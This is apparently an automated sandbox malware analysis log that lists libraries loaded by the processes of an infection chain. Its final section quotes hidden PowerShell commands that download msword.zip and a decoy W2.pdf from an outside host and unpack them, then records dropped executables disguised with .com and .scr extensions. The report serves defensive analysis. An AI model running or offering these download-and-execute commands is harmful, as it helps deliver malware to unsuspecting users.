Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Section loaded: wldp.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

15_2_00406328

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B50DE6 push ecx; ret	36_2_00B50DF9
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_006202D8 push cs; retn 0061h	38_2_00620318
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005F0DE6 push ecx; ret	38_2_005F0DF9
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005EDC7C push AA0062CFh; iretd	38_2_005EDC87

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	File created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\677826\Prostores.com			Jump to dropped file

